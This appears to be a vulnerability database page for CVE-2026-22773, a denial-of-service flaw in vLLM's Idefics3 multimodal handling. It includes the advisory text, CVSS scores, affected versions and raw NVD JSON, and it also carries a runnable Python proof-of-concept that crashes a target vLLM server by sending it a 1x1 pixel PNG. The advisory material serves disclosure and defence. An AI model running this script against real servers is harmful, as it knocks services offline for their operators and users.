Security Vulnerability Report
中文
CVE-2026-22773 CVSS 6.5 MEDIUM

CVE-2026-22773

Published: 2026-01-10 07:16:04
Last Modified: 2026-01-27 21:03:47
Source: [email protected]

Description

vLLM is an inference and serving engine for large language models (LLMs). In versions from 0.6.4 to before 0.12.0, users can crash the vLLM engine serving multimodal models that use the Idefics3 vision model implementation by sending a specially crafted 1x1 pixel image. This causes a tensor dimension mismatch that results in an unhandled runtime error, leading to complete server termination. This issue has been patched in version 0.12.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* - VULNERABLE
vLLM 0.6.4 <= version < 0.12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-22773 PoC - vLLM Idefics3 DoS via 1x1 pixel image This PoC demonstrates the denial of service vulnerability in vLLM's Idefics3 model implementation. """ import base64 import json import requests def create_1x1_pixel_image(): """Create a minimal 1x1 pixel PNG image (1x1 transparent pixel)""" # Minimal valid PNG: 1x1 transparent pixel png_data = base64.b64decode( 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNk+M9QDwADhgGAWjR9awAAAABJRU5ErkJggg==' ) return png_data def exploit_vllm_dos(target_url, model_name): """ Send a crafted 1x1 pixel image to trigger the DoS vulnerability Args: target_url: Base URL of vLLM server (e.g., 'http://localhost:8000') model_name: Name of the Idefics3 model in service """ headers = { 'Content-Type': 'application/json' } # Create the 1x1 pixel image image_bytes = create_1x1_pixel_image() image_base64 = base64.b64encode(image_bytes).decode('utf-8') # Construct request payload for multimodal inference payload = { 'model': model_name, 'messages': [ { 'role': 'user', 'content': [ { 'type': 'text', 'text': 'Describe this image briefly.' }, { 'type': 'image_url', 'image_url': { 'url': f'data:image/png;base64,{image_base64}' } } ] } ], 'max_tokens': 100, 'temperature': 0.7 } try: response = requests.post( f'{target_url}/v1/chat/completions', headers=headers, json=payload, timeout=30 ) print(f'Response status: {response.status_code}') print(f'Response: {response.text}') except requests.exceptions.RequestException as e: print(f'Request failed (service may have crashed): {e}') if __name__ == '__main__': import sys if len(sys.argv) < 3: print('Usage: python cve_2026_22773_poc.py <vllm_url> <model_name>') print('Example: python cve_2026_22773_poc.py http://localhost:8000 idefics3-8b') sys.exit(1) target = sys.argv[1] model = sys.argv[2] print(f'Targeting vLLM at {target} with model {model}') print('Sending crafted 1x1 pixel image...') exploit_vllm_dos(target, model)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22773", "sourceIdentifier": "[email protected]", "published": "2026-01-10T07:16:03.527", "lastModified": "2026-01-27T21:03:47.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). In versions from 0.6.4 to before 0.12.0, users can crash the vLLM engine serving multimodal models that use the Idefics3 vision model implementation by sending a specially crafted 1x1 pixel image. This causes a tensor dimension mismatch that results in an unhandled runtime error, leading to complete server termination. This issue has been patched in version 0.12.0."}, {"lang": "es", "value": "vLLM es un motor de inferencia y servicio para modelos de lenguaje grandes (LLMs). En versiones desde la 0.6.4 hasta antes de la 0.12.0, los usuarios pueden colapsar el motor vLLM que sirve modelos multimodales que utilizan la implementación del modelo de visión Idefics3 enviando una imagen de 1x1 píxel especialmente diseñada. Esto causa un desajuste de dimensión de tensor que resulta en un error de tiempo de ejecución no manejado, lo que lleva a la terminación completa del servidor. Este problema ha sido parcheado en la versión 0.12.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:*", "versionStartIncluding": "0.6.4", "versionEndExcluding": "0.12.0", "matchCriteriaId": "824D7904-D175-4B2E-A661-EBCA035697DC"}]}]}], "references": [{"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-grg2-63fw-f2qr", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.